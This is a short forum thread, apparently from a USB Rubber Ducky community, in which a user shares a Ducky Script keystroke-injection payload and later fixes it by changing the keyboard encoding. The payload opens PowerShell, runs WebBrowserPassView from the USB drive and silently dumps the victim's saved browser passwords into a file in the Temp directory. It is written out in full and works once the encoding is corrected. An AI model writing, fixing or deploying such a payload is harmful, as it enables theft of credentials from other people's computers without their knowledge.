MichaelV Posted June 3, 2017 Share Posted June 3, 2017 When I execute line by line to test if the script is working I do get a result, but when I try to execute it as a inject.bin I get a powershell error Error 3: The system cannot find path specified I want to use the WebBrowserPassView to save the result in user's temp directory: DELAY 1000 GUI R DELAY 100 STRING powershell ENTER DELAY 500 STRING $usbpath = Get-WMIObject win32_Volume | ? { $_.Label -eq '_' } | select name ENTER DELAY 100 STRING Set-Variable -Name "profile" $env:USERPROFILE\AppData\Local\Temp ENTER DELAY 100 STRING cd $usbpath.name ENTER DELAY 100 STRING ./WebBrowserPassView.exe /stext $profile\temp.txt ENTER DELAY 100 STRING exit DELAY 100 ENTER Can someone help me in this one? Quote Link to comment Share on other sites More sharing options...
MichaelV Posted June 3, 2017 Author Share Posted June 3, 2017 The encoding should be US and I had it GB Problem solved )) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.